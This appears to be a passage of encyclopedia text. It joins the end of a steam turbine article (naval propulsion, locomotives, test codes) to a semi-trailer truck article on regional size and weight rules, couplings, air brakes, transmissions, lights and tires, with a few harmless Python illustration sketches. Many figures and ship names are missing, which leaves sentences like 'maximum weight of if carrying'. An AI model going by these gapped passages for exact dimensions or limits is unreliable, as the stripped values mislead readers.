efficient range at a much higher speed than the shaft, but were expensive to manufacture. Cruising turbines competed at first with reciprocating engines for fuel economy. An example of the retention of reciprocating engines on fast ships was a famous liner of 1911, which along with her sister ships had triple-expansion engines on the two outboard shafts, both exhausting to an LP turbine on the center shaft. After adopting turbines with the s launched in 1909, the United States Navy reverted to reciprocating machinery on the s of 1912, then went back to turbines on Nevada in 1914. The lingering fondness for reciprocating machinery was because the US Navy had no plans for capital ships exceeding until after World War I, so top speed was less important than economical cruising. The United States had acquired the Philippines and Hawaii as territories in 1898, and lacked the British Royal Navy's worldwide network of coaling stations. Thus, the US Navy in 1900–1940 had the greatest need of any nation for fuel economy, especially as the prospect of war with Japan arose following World War I. This need was compounded by the US not launching any cruisers 1908–1920, so destroyers were required to perform long-range missions usually assigned to cruisers. So, various cruising solutions were fitted on US destroyers launched 1908–1916. These included small reciprocating engines and geared or ungeared cruising turbines on one or two shafts. However, once fully geared turbines proved economical in initial cost and fuel they were rapidly adopted, with cruising turbines also included on most ships. Beginning in 1915 all new Royal Navy destroyers had fully geared turbines, and the United States followed in 1917. In the Royal Navy, speed was a priority until the Battle of Jutland in mid-1916 showed that in the battlecruisers too much armour had been sacrificed in its pursuit. The British used exclusively turbine-powered warships from 1906. Because they recognized that a long cruising range would be desirable given their worldwide empire, some warships, notably the s, were fitted with cruising turbines from 1912 onwards following earlier experimental installations. In the US Navy, the s, launched 1935–36, introduced double-reduction gearing.
This further increased the turbine speed above the shaft speed, allowing smaller turbines than single-reduction gearing. Steam pressures and temperatures were also increasing progressively, from / [saturated steam] on the World War I-era to / [superheated steam] on some World War II s and later ships. A standard configuration emerged of an axial-flow high-pressure turbine (sometimes with a cruising turbine attached) and a double-axial-flow low-pressure turbine connected to a double-reduction gearbox. This arrangement continued throughout the steam era in the US Navy and was also used in some Royal Navy designs. Machinery of this configuration can be seen on many preserved World War II-era warships in several countries. When US Navy warship construction resumed in the early 1950s, most surface combatants and aircraft carriers used / steam. This continued until the end of the US Navy steam-powered warship era with the s of the early 1970s. Amphibious and auxiliary ships continued to use steam post-World War II, with , launched in 2001, possibly the last non-nuclear steam-powered ship built for the US Navy. Turbo-electric drive Turbo-electric drive was introduced on the battleship , launched in 1917. Over the next eight years the US Navy launched five additional turbo-electric-powered battleships and two aircraft carriers (initially ordered as s). Ten more turbo-electric capital ships were planned, but cancelled due to the limits imposed by the Washington Naval Treaty. Although New Mexico was refitted with geared turbines in a 1931–1933 refit, the remaining turbo-electric ships retained the system throughout their careers. This system used two large steam turbine generators to drive an electric motor on each of four shafts. The system was less costly initially than reduction gears and made the ships more maneuverable in port, with the shafts able to reverse rapidly and deliver more reverse power than with most geared systems. Some ocean liners were also built with turbo-electric drive, as were some troop transports and mass-production destroyer escorts in World War II. However, when the US designed the "treaty cruisers", beginning with launched in 1927, geared turbines were used to conserve weight, and remained in use for all fast steam-powered ships thereafter. Current usage Since the 1980s, steam turbines have been replaced by gas turbines on fast ships and by diesel engines on other ships; exceptions are nuclear-powered ships and submarines and LNG carriers. Some auxiliary ships continue to use steam propulsion. In the U.S. Navy, the conventionally powered steam turbine is still in use on all but one of the Wasp-class amphibious assault ships. The Royal Navy decommissioned its last conventional steam-powered surface warship class, the , in 2002, with the Italian Navy following in 2006 by decommissioning its last conventional steam-powered surface warships, the s. In 2013, the French Navy ended its steam era with the decommissioning of its last . Amongst the other blue-water navies, the Russian Navy currently operates steam-powered s and s. The Indian Navy currently operates INS Vikramaditya, a modified ; it also operates three s commissioned in the early 2000s. The Chinese Navy currently operates steam-powered s, s along with s and the lone Type 051B destroyer. Most other naval forces have either retired or re-engined their steam-powered warships. As of 2020, the Mexican Navy operates four steam-powered former U.S. s. 
The Egyptian Navy and the Republic of China Navy respectively operate two and six former U.S. s. The Ecuadorian Navy currently operates two steam-powered s (modified s). Today, propulsion steam turbine cycle efficiencies have yet to break 50%, yet diesel engines routinely exceed 50%, especially in marine applications. Diesel power plants also have lower operating costs since fewer operators are required. Thus, conventional steam power is used in very few new ships. An exception is LNG carriers which often find it more economical to use boil-off gas with a steam turbine than to re-liquify it. Nuclear-powered ships and submarines use a nuclear reactor to create steam for turbines. As of 2024, the main propulsion steam turbines (HP & LP) for United States Navy nuclear-powered Nimitz and Ford class aircraft carriers are manufactured by the Curtiss-Wright Corporation in Summerville, SC. Nuclear power is often chosen where diesel power would be impractical (as in submarine applications) or the logistics of refuelling pose significant problems (for example, icebreakers). It has been estimated that the reactor fuel for the Royal Navy's s is sufficient to last 40 circumnavigations of the globe – potentially sufficient for the vessel's entire service life. Nuclear propulsion has only been applied to a very few commercial vessels due to the expense of maintenance and the regulatory controls required on nuclear systems and fuel cycles. Locomotives A steam turbine locomotive engine is a steam locomotive driven by a steam turbine. The first steam turbine rail locomotive was built in 1908 for the Officine Meccaniche Miani Silvestri Grodona Comi, Milan, Italy. In 1924 Krupp built the steam turbine locomotive T18 001, operational in 1929, for Deutsche Reichsbahn. The main advantages of a steam turbine locomotive are better rotational balance and reduced hammer blow on the track. However, a disadvantage is less flexible output power so that turbine locomotives were best suited for long-haul operations at a constant output power. Testing British, German, other national and international test codes are used to standardize the procedures and definitions used to test steam turbines. Selection of the test code to be used is an agreement between the purchaser and the manufacturer, and has some significance to the design of the turbine and associated systems. In the United States, ASME has produced several performance test codes on steam turbines. These include ASME PTC 6–2004, Steam Turbines, ASME PTC 6.2-2011, Steam Turbines in Combined Cycles, PTC 6S-1988, Procedures for Routine Performance Test of Steam Turbines. These ASME performance test codes have gained international recognition and acceptance for testing steam turbines. The single most important and differentiating characteristic of ASME performance test codes, including PTC 6, is that the test uncertainty of the measurement indicates the quality of the test and is not to be used as a commercial tolerance.
Technology
Electricity generation and distribution
null
29381
https://en.wikipedia.org/wiki/Semi-trailer%20truck
Semi-trailer truck
A semi-trailer truck (also known by a wide variety of other terms – see below) is the combination of a tractor unit and one or more semi-trailers to carry freight. A semi-trailer attaches to the tractor with a type of hitch called a fifth wheel. Other terms There are a wide variety of English-language terms for a semi-trailer truck, including: American English Semi-trailer Semi-truck Truck & trailer Semi Big rig Tractor-trailer Eighteen-wheeler British English Articulated lorry Artic (short for articulated) Juggernaut Canadian English Transport truck Transfer truck Regional configurations Europe The main difference between tractor units in Europe and North America is that European models are cab over engine (COE, called "forward control" in the United Kingdom), while the majority of North American trucks are "conventional" (called "normal control" or "bonneted" in the UK). European trucks, whether straight trucks or fully articulated, have a sheer face on the front. This allows shorter trucks with longer trailers (with larger freight capacity) within the legal maximum total length. Furthermore, it offers greater maneuverability in confined areas, a more balanced weight distribution, and a better overall view for the driver. The major disadvantage is that for repairs on COE trucks, the entire cab has to hinge forward to allow maintenance access. In Europe, usually only the driven tractor axle has dual wheels, while single wheels are used for every other axle on the tractor and the trailer. The most common combination used in Europe is a semi tractor with two axles and a cargo trailer with three axles, one of which is sometimes a lift axle, giving 5 axles and 12 wheels in total. This format is now common across Europe as it is able to meet the EU maximum weight limit without overloading any axle. Individual countries have raised their own weight limits. The U.K., for example, has a higher limit, an increase achieved by adding an extra axle to the tractor, usually in the form of a middle unpowered lifting axle (midlift), for a total of 14 wheels. The lift axles used on both tractors and trailers allow the trucks to remain legal when fully loaded (as weight per axle remains within the legal limits); on the other hand, these axle sets can be raised off the roadway for increased maneuverability or for reduced fuel consumption and tire wear when carrying lighter loads. Although lift axles usually operate automatically, they can be lowered manually even while carrying light loads, in order to remain within legal (safe) limits when, for example, navigating back-road bridges with severely restricted axle loads. For greater detail, see the United Kingdom section, below.
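A crude sketch of the axle-load bookkeeping behind lift axles (the limits and loads below are illustrative assumptions, not the country-specific legal values discussed above): raising an axle spreads the same gross weight over fewer axles.

```python
AXLE_LIMIT_T = 9.0    # assumed per-axle limit in tonnes (illustrative only)

def load_per_axle(gross_t: float, axles_down: int) -> float:
    """Crude even-split model of the load carried by each axle on the road."""
    return gross_t / axles_down

for axles in (6, 5):  # e.g. lift axle down (6 axles) vs raised (5 axles)
    load = load_per_axle(50.0, axles)   # assume a 50 t gross combination
    verdict = "OK" if load <= AXLE_LIMIT_T else "over the per-axle limit"
    print(f"{axles} axles on the road: {load:.1f} t/axle -> {verdict}")
# Fully loaded, the lift axle must stay down; lightly loaded, it can be raised.
```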
When using a dolly, which generally has to be equipped with lights and a license plate, rigid trucks can be used to pull semi-trailers. The dolly is equipped with a fifth wheel to which the trailer is coupled. Because the dolly attaches to a pintle hitch on the truck, maneuvering a trailer hooked to a dolly is different from maneuvering a fifth-wheel trailer. Backing the vehicle requires the same technique as backing an ordinary truck/full trailer combination, though the dolly/semi setup is probably longer, thus requiring more space for maneuvering. The tractor/semi-trailer configuration is rarely used on timber trucks, since rigid trucks offer two major advantages there: the weight of the load rests on the drive wheels, and the loader crane used to lift the logs from the ground can be mounted on the rear of the truck behind the load, allowing a short (lightweight) crane to reach both ends of the vehicle without uncoupling. Also, construction trucks are more often seen in a rigid + midaxle trailer configuration instead of the tractor/semi-trailer setup. Continental Europe The maximum overall length in the EU and EEA member states was with a maximum weight of if carrying an ISO container. However, rules limiting the semi-trailers to and 18.75 m are met with trucks carrying a standardized body with one additional 7.82 m body on tow as a trailer. Truck combinations were developed under the branding of EcoCombi, which influenced the name of EuroCombi for an ongoing standardization effort where such truck combinations shall be legal to operate in all jurisdictions of the European Economic Area. With the 50% increase in cargo weight, the fuel efficiency increases an average of 20%, with a corresponding relative decrease in carbon emissions and with the added benefit of one third fewer trucks on the road. The 1996 EU regulation defines a European Modular System (EMS) as it was implemented in Sweden. The wordings EMS combination and EuroCombi are now used interchangeably to point to truck combinations as specified in the EU document; however, apart from Sweden and Finland, the EuroCombi is only allowed to operate on specific roads in other EU member states. In 1996, Sweden and Finland formally won a final exemption from the European Economic Area rules with 60 tonne and combinations. From 2006, 25.25 m truck trailer combinations are allowed on restricted routes within Germany, following a similar (ongoing) trial in the Netherlands. Similarly, Denmark has allowed 25.25 m combinations on select routes. These vehicles will run under a weight limit. Two types are to be used: 1) a 26-tonne truck pulling a dolly and semi-trailer, or 2) an articulated tractor unit pulling a B-double. Other member states gained the ability to adopt the same rules. In Italy the maximum permitted weight (unless exceptional transport is authorized) is 44 tonnes for any kind of combination with five axles or more. The Czech Republic has allowed 25.25 m combinations with a permission for a selected route. Nordic countries Denmark and Norway allow trucks (Denmark from 2008, and Norway from 2008 on selected routes). In Sweden, the allowed length has been since 1967. Before that, the maximum length was unlimited; the only limitations were on axle load. What stopped Sweden from adopting the same rules as the rest of Europe, while still securing road safety, was the national importance of a competitive forestry industry. Finland, with the same road safety issues and an equally important forestry industry, followed suit. The change made trucks able to carry three stacks of cut-to-length logs instead of two, as it would be in a short combination. They have one stack together with a crane on the 6×4 truck, and two additional stacks on a four-axle trailer. The allowed gross weight in both countries is up to depending on the distance between the first and last axle.
In the negotiations starting in the late 1980s preceding Sweden and Finland's entries to the European Economic Area and later the European Union, they insisted on exemptions from the EU rules, citing environmental concerns and the transportation needs of the logging industry. In 1995, after their entry to the union, the rules changed again, this time to allow trucks carrying a standard CEN unit of to draw a standard semi-trailer on a dolly, a total overall length of 25.25 m. Later, B-double combinations came into use, often with one container on the B-link and a container (or two containers) on a semi-trailer bed. In allowing the longer truck combinations, what would take two semi-trailer trucks and one truck and trailer to haul on the continent can now be handled by just two 25.25 m trucks – greatly reducing overall costs and emissions. Prepared since late 2012 and effective in January 2013, Finland changed its regulations to allow a higher total maximum legal weight for a combination. At the same time, the maximum allowed height was increased from the previous maximum of to . The effect this major maximum weight increase will have on the roads and bridges in Finland over time is strongly debated. However, longer and heavier combinations are regularly seen on public roads; special permits are issued for special cargo. The mining company Boliden AB has a standing special permit for combinations on select routes between mines in the inland and the processing plant in Boliden, taking a load of ore. Volvo has a special permit for a steering B-trailer-trailer combination carrying two containers to and from Gothenburg harbour and the Volvo Trucks factory, all on the island of Hisingen. Another example is the ongoing project En Trave Till (lit. "one more pile/stack"), started in December 2008, which allows even longer vehicles to further rationalize the logging transports. As the name of the project points out, such a vehicle is able to carry four stacks of timber, instead of the usual three. The test is limited to Norrbotten county and the European route E4 between the timber terminal in Överkalix and the sawmill in Munksund (outside Piteå). The vehicle is a long truck-trailer combination with a gross weight exceeding . It is estimated that this will give a 20% lower cost and a 20–25% emissions reduction compared to the regular truck combinations. As the combination spreads its weight over more axles, braking distance, road wear and traffic safety are believed to be either the same or improved with the truck-trailer. In the same program, two types of combinations will be tested in Dalsland and Bohuslän counties in western Sweden: an enhanced truck and trailer combination for use in the forest, and a B-double for plain highway transportation to the mill in Skoghall. In 2012, the Northland Mining company received permission for combinations with normal axle load (an extra dolly) for use on the Kaunisvaara–Svappavaara route, carrying iron ore. The longest and heaviest truck in everyday use in Finland is operated by transport company Ketosen Kuljetus as part of a pilot project studying transport efficiency in the timber industry. The combined vehicle is long, has 13 axles, and weighs a total of . Starting from 21 January 2019, the Government of Finland increased the maximum allowed length of truck combinations to 34.5 metres. New types of vehicle combinations that differ from the current standards may also be used on the road.
The requirements for such combinations also include camera systems for side visibility, an advanced emergency braking and lane detection system, an electronic driving stability system and electronically controlled brakes. The maximum length of a vehicle combination is now 34.5 metres. United Kingdom In the United Kingdom, a semi-trailer truck is known as an 'articulated lorry' (or colloquially as an 'artic'). The maximum permitted gross weight of a semi-trailer truck without the use of a Special Type General Order (STGO) is 44,000 kg. In order for a 44,000 kg semi-trailer truck to be permitted on UK roads the tractor and semi-trailer must have three or more axles each. Lower-weight semi-trailer trucks can mean some tractors and trailers having fewer axles. In practice, as with double-decker buses and coaches in the UK, there is no legal height limit for semi-trailer trucks; however, bridges with a clearance above a certain height do not have the height marked on them. Semi-trailer trucks in continental Europe have a height limit of . Vehicles heavier than 44,000 kg are permitted on UK roads but are indivisible loads, which would be classed as abnormal (or oversize). Such vehicles are required to display an STGO (Special Types General Order) plate on the front of the tractor unit and, under certain circumstances, are required to travel by an authorized route and have an escort. Most UK trailers are long and, dependent on the position of the fifth wheel and kingpin, a coupled tractor unit and trailer will have a combined length of between . Although the Construction and Use Regulations allow a maximum rigid length of , this, combined with a shallow kingpin and a fifth wheel set close to the rear of the tractor unit, can give an overall length of around . In January 2012, the Department for Transport began conducting a trial of longer semi-trailers. The trial involves 900 semi-trailers of in length (i.e. longer than the current maximum), and a further 900 semi-trailers of in length (i.e. longer). This will result in the total maximum length of the semi-trailer truck being for trailers in length, and for trailers long. The increase in length will not result in the weight limit being exceeded, and will allow some operators to approach the weight limit, which may not have been previously possible due to the previous length of trailers. The trial will run for a maximum of 10 years. Providing certain requirements are fulfilled, a Special Types General Order (STGO) allows for vehicles of any size or weight to travel on UK roads. However, in practice, any such vehicle has to travel by a route authorized by the Department of Transport and move under escort. The escort of abnormal loads in the UK is now predominantly carried out by private companies, but extremely large or heavy loads that require road closures must still be escorted by the police. In the UK, some semi-trailer trucks have eight tyres on three axles on the tractor; these are known as six-wheelers or "six-leggers", with either the centre or rear axle having single wheels which normally steer as well as the front axle and can be raised when not needed (i.e. when unloaded or when only a light load is being carried; an arrangement known as a tag axle when it is the rear axle, or mid-lift when it is the centre axle). Some trailers have two axles which have twin tyres on each axle; other trailers have three axles, of which one axle can be a lift axle which has super-single wheels.
In the UK, two wheels bolted to the same hub are classed as a single wheel; therefore a standard six-axle articulated truck is considered to have twelve wheels, even though it has twenty tyres. The UK also allows semi-trailer trucks which have six tyres on two axles; these are known as four-wheelers. In 2009, the operator Denby Transport designed and built a B-Train (or B-double) semi-trailer truck called the Denby Eco-Link to show the benefits of such a vehicle: a reduction in road accidents and deaths, a reduction in emissions (since only one tractor unit is still used), and no requirement for further highway investment. Furthermore, Denby Transport asserted that two Eco-Links would replace three standard semi-trailer trucks while, if limited to the current UK weight limit of , it was claimed the Eco-Link would reduce carbon emissions by 16% and could still halve the number of trips needed for the same amount of cargo carried in conventional semi-trailer trucks. This is based on the fact that for light but bulky goods such as toilet paper, plastic bottles, cereals and aluminum cans, conventional semi-trailer trucks run out of cargo space before they reach the weight limit. At , as opposed to the usually associated with B-Trains, the Eco-Link also exerts less weight per axle on the road compared to the standard six-axle semi-trailer truck. The vehicle was built after Denby Transport believed they had found a legal loophole in the present UK law to allow the Eco-Link to be used on public roads. The relevant legislation concerned the 1986 Road Vehicles Construction and Use Regulations. The 1986 regulations state that "certain vehicles" may be permitted to draw more than one trailer and can be up to . The point of law reportedly hinged on the definition of a "towing implement", with Denby prepared to argue that the second trailer on the Eco-Link was one. The Department for Transport was of the opinion that this refers to recovering a vehicle after an accident or breakdown, but the regulation does not explicitly state this. During BTAC performance testing the Eco-Link was given an "excellent" rating for its performance in maneuverability, productivity, safety and emissions tests, exceeding ordinary semi-trailer trucks in many respects. Reportedly, private trials had also shown the Denby vehicle had a 20% shorter stopping distance than conventional semi-trailer trucks of the same weight, due to having extra axles. The active steer system meant that the Eco-Link had a turning circle of , the same as a conventional semi-trailer truck. Although the Department for Transport advised that the Eco-Link was not permissible on public roads, Denby Transport gave the police prior warning of the timing and route of the test drive on the public highway, as well as outlining their position in writing to the Eastern Traffic Area Office. On 1 December 2009, Denby Transport was preparing to drive the Eco-Link on public roads, but this was cut short because the police pulled the semi-trailer truck over as it left the gates in order to test it for its legality "to investigate any... offenses which may be found". The police said the vehicle was unlawful due to its length, and Denby Transport was served with a notice by the Vehicle and Operator Services Agency (VOSA) inspector to remove the vehicle from the road for inspection. Having returned to the yard, Denby Transport was formally notified by the police and VOSA that the semi-trailer truck could not be used.
Neither the Eco-Link nor any other B-Train has since been permitted on UK roads. However, this prompted the Department for Transport to undertake a desk study into semi-trailer trucks, which resulted in the longer semi-trailer trial which commenced in 2012. North America In North America, the combination vehicles made up of a powered semi-tractor and one or more semi-trailers are known as "semis", "semitrailers", "tractor-trailers", "big rigs", "semi-trucks", "eighteen-wheelers", or "semi-tractor-trailers". The tractor unit typically has two or three axles; those built for hauling heavy-duty commercial-construction machinery may have as many as five, some often being lift axles. The most common tractor-cab layout has a forward engine, one steering axle, and two drive axles. The fifth-wheel trailer coupling on most tractor trucks is movable fore and aft, to allow adjustment in the weight distribution over its rear axle(s). Ubiquitous in Europe but less common in North America since the 1990s is the cabover engine configuration, where the driver sits next to or over the engine. With changes in the US to the maximum length of the combined vehicle, the cabover was largely phased out of North American over-the-road (long-haul) service by 2007. Cabovers were difficult to service; for a long time, the cab could not be lifted on its hinges to a full 90-degree forward tilt, severely limiting access to the front of the engine. A new truck could cost , while the diesel fuel cost could be $70,000 per year. Trucks average from , with fuel economy standards requiring better than efficiency by 2014. Power requirements in standard conditions are at or at , and somewhat different power usage in other conditions. The cargo trailer usually has tandem axles at the rear, each of which has dual wheels, or eight tires on the trailer, four per axle. In the US it is common to refer to the number of wheel hubs, rather than the number of tires; an axle can have either single or dual tires with no legal difference. The combination of eight tires on the trailer and ten tires on the tractor is what led to the moniker eighteen-wheeler, although this term is considered by some truckers to be a misnomer (the term "eighteen-wheeler" is a nickname for a five-axle over-the-road combination). Many trailers are equipped with movable tandem axles to allow adjusting the weight distribution. To connect the second of a set of doubles to the first trailer, and to support the front half of the second trailer, a converter gear known as a "dolly" is used. This has one or two axles, a fifth-wheel coupling for the rear trailer, and a tongue with a ring-hitch coupling for the forward trailer. Individual states may further allow longer vehicles, known as "longer combination vehicles" (or LCVs), and may allow them to operate on roads other than Interstates. Long combination vehicle types include: Doubles (officially "STAA doubles", known colloquially as "a set of joints"): Two trailers. B-Doubles: Twin trailers in B-double configuration (very common in Canada but rarely used in the United States). Triples: Three trailers. Turnpike Doubles: Two – trailers. Rocky Mountain Doubles: One trailer (though usually no more than ) and one trailer (known as a "pup"). In Canada, a Turnpike Double is two trailers, and a Rocky Mountain Double is a trailer with a "pup". The US federal government, which only regulates the Interstate Highway System, does not set maximum length requirements (except on auto and boat transporters), only minimums. Tractors can pull two or three trailers if the combination is legal in that state. Weight maximums are on a single axle, on a tandem, and total for any vehicle or combination. There is a maximum width of and no maximum height.
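A hedged sketch of checking a combination against the commonly cited US federal interstate limits (20,000 lb single axle, 34,000 lb tandem, 80,000 lb gross; treat these figures as illustrative, since exact rules and exceptions vary):

```python
LIMITS = {"single_axle": 20_000, "tandem": 34_000, "gross": 80_000}  # pounds

def check_rig(single_axles, tandems, gross):
    """single_axles and tandems are lists of axle-group weights in pounds."""
    problems = [f"single axle {w} lb" for w in single_axles if w > LIMITS["single_axle"]]
    problems += [f"tandem {w} lb" for w in tandems if w > LIMITS["tandem"]]
    if gross > LIMITS["gross"]:
        problems.append(f"gross {gross} lb")
    return problems or ["within the limits used here"]

# A typical five-axle rig: steer axle, drive tandem, trailer tandem.
print(check_rig([12_000], [34_000, 34_000], 80_000))
```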
Roads other than Interstates are regulated by individual states, and laws vary widely. Maximum weights vary from state to state, depending on the combination. Most states restrict operation of larger tandem trailer setups such as triple units, turnpike doubles, and Rocky Mountain doubles. Reasons for limiting the legal trailer configurations include safety concerns and the impracticality of designing and constructing roads that can accommodate the larger wheelbase of these vehicles and the larger minimum turning radii associated with them. In general, these configurations are restricted to the Interstates. Except for these units, double setups are not restricted to certain roads any more than a single setup. They are also not restricted by weather conditions or "difficulty of operation". The Canadian province of Ontario, however, does have weather-related operating restrictions for larger tandem trailer setups.
Articulated trucks towing a single trailer or two trailers (commonly known as "short doubles") with a maximum overall length of are referred to as "general access heavy vehicles" and are permitted in all areas, including metropolitan. B-doubles are limited to a maximum total weight of 62.5 tonnes and overall length of , or if they are fitted with approved FUPS (front underrun protection system) devices. B-doubles may only operate on designated roads, which include most highways and some major metropolitan roads. B-doubles are very common in all parts of Australia, including state capitals, and on major routes they outnumber single-trailer configurations. The maximum width of any vehicle is and the maximum height is . In the past few years, allowance has been made by several states to allow certain designs of heavy vehicles up to high, but these are also restricted to designated routes. In effect, a 4.6-metre-high B-double has to follow two sets of rules: it may access only those roads that are permitted for B-doubles and for 4.6-metre-high vehicles. In Australia, both conventional prime movers and cabovers are common; however, cabovers are most often seen on B-doubles on the eastern seaboard, where the reduction in total length allows the vehicle to pull longer trailers and thus more cargo than it would otherwise. New Zealand New Zealand legislation governing truck dimensions falls under the Vehicle Dimensions and Mass Rules, published by the NZ Transport Agency. New rules were introduced effective 1 February 2017, which increased the maximum height, width and weight of loads and vehicles, to simplify regulations, increase the amount of freight carried by road, and improve the range of vehicles and trailers available to transport operators. Common combinations in New Zealand are a standard semi-trailer, a B-double, or a rigid towing vehicle pulling a trailer with a drawbar, with a maximum of nine axles. Standard maximum vehicle lengths for trailers with one axle set are: Semi-trailer: Simple: Pole: Trailers with two axle sets can be long, including heavy rigid vehicles towing two trailers. Oversized loads require, at minimum, a permit, and may require one or more pilot vehicles. High-productivity motor vehicle (HPMV) permits are issued for vehicles exceeding 44 tonnes, or the above dimensions. Trucks up to 62 tonnes were allowed, with an initial bridge-strengthening program costing $12.5m. Construction Types of trailers There are many types of semi-trailers in use, designed to haul a wide range of products. Box, or dry van Bus Car hauler Intermodal chassis Dry bulk Dump Flatbed Hopper-bottom Lowboy Refrigerator (reefer) Tanker Coupling and uncoupling The cargo trailer is, by means of a kingpin, hooked to a horseshoe-shaped quick-release coupling device called a fifth wheel or a turntable hitch at the rear of the towing engine that allows easy hook-up and release. The semi-trailer cannot move by itself because it only has wheels at the rear end: it requires a forward axle, provided by the towing engine, to carry half the load weight. When braking hard at high speeds, the vehicle has a tendency to fold at the pivot point between the towing vehicle and the trailer. Such a truck accident is called a "trailer swing", although it is also commonly described as a "jackknife"; strictly, jackknifing is the condition where the tractive unit swings round against the trailer, and not vice versa. Braking Semi trucks use air pressure, rather than hydraulic fluid, to actuate the brakes.
The use of air hoses allows for ease of coupling and uncoupling of trailers from the tractor unit. The most common failure is brake fade, usually caused when the drums or discs and the linings of the brakes overheat from excessive use. The parking brake of the tractor unit and the emergency brake of the trailer are spring brakes that require air pressure in order to be released. They are applied when air pressure is released from the system, and disengaged when air pressure is supplied. This is a fail-safe design feature which ensures that if air pressure to either unit is lost, the vehicle will grind to a halt instead of continuing with no brakes and becoming uncontrollable. The trailer controls are coupled to the tractor through two gladhand connectors, which provide air pressure, and an electrical cable, which provides power to the lights and any specialized features of the trailer. Glad-hand connectors (also known as palm couplings) are air hose connectors, each of which has a flat engaging face and retaining tabs. The faces are placed together, and the units are rotated so that the tabs engage each other to hold the connectors together. This arrangement provides a secure connection but allows the couplers to break away without damaging the equipment if they are pulled, as may happen when the tractor and trailer are separated without first uncoupling the air lines. These connectors are similar in design to the ones used for a similar purpose between railroad cars. Two air lines typically connect to the trailer unit. An emergency or main air supply line pressurizes the trailer's air tank and disengages the emergency brake, and a second service line controls brake application during normal operation. In the UK, the male/female quick-release connectors are arranged so that the red (emergency) line has a female fitting on the truck and a male on the trailer, while the yellow (service) line has a male on the truck and a female on the trailer. This avoids coupling errors (which would cause no brakes), and the connections will not come apart if pulled by accident. The three electrical lines fit only one way round: a primary (black), a secondary (green), and an ABS lead, all of which are collectively known as suzies or suzie coils. In New Zealand, all trucks and trailers use a DUOMATIC air coupler, which has female receivers mounted on the truck/tractor and on the trailer, and male fittings on both ends of the suzie lines (which can be completely removed and stored in the cab to prevent theft). Connecting the red and blue lines is one operation at each end. The red and blue lines are always on the same side of every fitting, so they can never be hooked up in reverse or the wrong way around. The same system is used in Europe. Another braking feature of semi-trucks is engine braking, which can be a compression brake (usually shortened to Jake brake), an exhaust brake, or a combination of both. However, the use of a compression brake alone produces a loud and distinctive noise, and to control noise pollution, some local municipalities have prohibited or restricted the use of engine brake systems inside their jurisdictions, particularly in residential areas. The advantage of using engine braking instead of conventional brakes is that a truck can descend a long grade without overheating its wheel brakes. Some vehicles can also be equipped with hydraulic or electric retarders, which have the advantage of near-silent operation. 
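The fail-safe logic described above (a spring applies the brake unless compressed air holds it released) can be captured in a few lines. The following is a conceptual Python sketch of that behaviour only; the pressure threshold is illustrative and it does not model any real brake controller:

```python
class SpringBrake:
    """Conceptual model of a fail-safe spring (parking/emergency) brake:
    a spring applies the brake unless compressed air holds it released."""

    RELEASE_PRESSURE_PSI = 60  # illustrative threshold, not a real specification

    def __init__(self):
        self.supply_pressure_psi = 0.0  # an uncoupled trailer has no air: brakes on

    def charge(self, psi: float) -> None:
        """Air from the emergency/supply line fills the trailer tank."""
        self.supply_pressure_psi = psi

    def line_rupture(self) -> None:
        """A broken gladhand or hose vents the supply line."""
        self.supply_pressure_psi = 0.0

    @property
    def applied(self) -> bool:
        # The brake is applied whenever air pressure is insufficient,
        # so losing air stops the vehicle rather than leaving it brakeless.
        return self.supply_pressure_psi < self.RELEASE_PRESSURE_PSI

brake = SpringBrake()
assert brake.applied        # uncoupled trailer: parked by spring force
brake.charge(120)
assert not brake.applied    # charged system: spring held off, free to roll
brake.line_rupture()
assert brake.applied        # air loss re-applies the brake (fail-safe)
```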
Transmission Because of the wide variety of loads a semi may carry, these trucks usually have a manual transmission, giving the driver as much control as possible. However, all truck manufacturers now offer automated manual transmissions (manual gearboxes with automated gear change), as well as conventional hydraulic automatic transmissions. Semi-truck transmissions can have as few as three forward speeds or as many as 18 forward speeds (plus 2 reverse speeds). A large number of transmission ratios means the driver can operate the engine more efficiently. Modern on-highway diesel engines are designed to provide maximum torque in a narrow RPM range (usually 1200–1500 RPM); having more gear ratios means the driver can hold the engine in its optimum range regardless of road speed (the drive axle ratio must also be considered). A ten-speed manual transmission, for example, is controlled via a six-slot H-box pattern, similar to that in five-speed cars: five forward gears and one reverse. Gears six to ten (and high-speed reverse) are accessed by a Lo/High range splitter; gears one to five are in Lo range, and gears six to ten are in High range, using the same shift pattern. A Super-10 transmission, by contrast, has no range splitter; it uses alternating "stick and button" shifting (stick shifts 1-3-5-7-9, button shifts 2-4-6-8-10). The 13-, 15-, and 18-speed transmissions have the same basic shift pattern but include a splitter button to enable additional ratios found in each range. Some transmissions may have 12 speeds. Another difference between semi-trucks and cars is the way the clutch is set up. On an automobile, the clutch pedal is depressed full stroke to the floor for every gear shift, to ensure the gearbox is disengaged from the engine. On a semi-truck with a constant-mesh (non-synchronized) transmission, such as the Eaton Roadranger series, not only is double-clutching required, but a clutch brake is required as well. The clutch brake stops the rotation of the gears and allows the truck to be put into gear without grinding when stationary. The clutch is pressed to the floor only to allow smooth engagement of low gears when starting from a full stop; when the truck is moving, the clutch pedal is pressed only far enough to break torque for gear changes. Theoretically, semi-trucks could have a diesel-electric transmission, as electric motors have better torque at 0 RPM than diesel engines, but this would significantly increase the weight of the truck itself, pushing it above the maximum legal weight for road vehicles. Lights An electrical connection is made between the tractor and the trailer through a cable often referred to as a pigtail. This cable is a bundle of wires in a single casing. Each wire controls one of the electrical circuits on the trailer, such as running lights, brake lights, turn signals, etc. A coiled cable is used, which retracts when not under tension (such as when the vehicle is not cornering); it is these coils that give the cable its pigtail look. In most countries, a trailer or semi-trailer must have at minimum 2 rear lights (red) 2 stop lights (red) 2 turning lights; one for right and one for left, flashing (amber; red optional in North America. 
May be combined with a brake light in North America) 2 marking lights behind if wider than certain specifications (red; plus a group of 3 red lights in the middle in North America) 2 marking lights front if wider than the truck or wider than certain specifications (white; amber in North America) Wheels and tires Although dual wheels are the most common, use of two single, wider tires, known as super singles, on each axle is becoming popular among bulk cargo carriers and other weight-sensitive operators. With increased efforts to reduce greenhouse gas emissions, the use of the super-single tire is gaining popularity. There are several advantages to this configuration. The first of these is that super singles reduce fuel consumption. In 1999, tests on an oval track showed a 10% fuel savings when super singles were used. These savings are realized because less energy is wasted flexing fewer tire sidewalls. Second, the lighter overall tire weight allows a truck to be loaded with more freight. The third advantage is that the single wheel encloses less of the brake unit, which allows faster cooling and reduces brake fade. In Europe, super singles became popular when the allowed weight of semitrailer rigs was increased from 38 to 40 tonnes. In this reform the trailer industry replaced two axles with dual wheels, with three axles on wide-base single wheels. The significantly lower axle weight on super singles must be considered when comparing road wear from single versus dual wheels. The majority of super singles sold in Europe have a width of . The standard 385 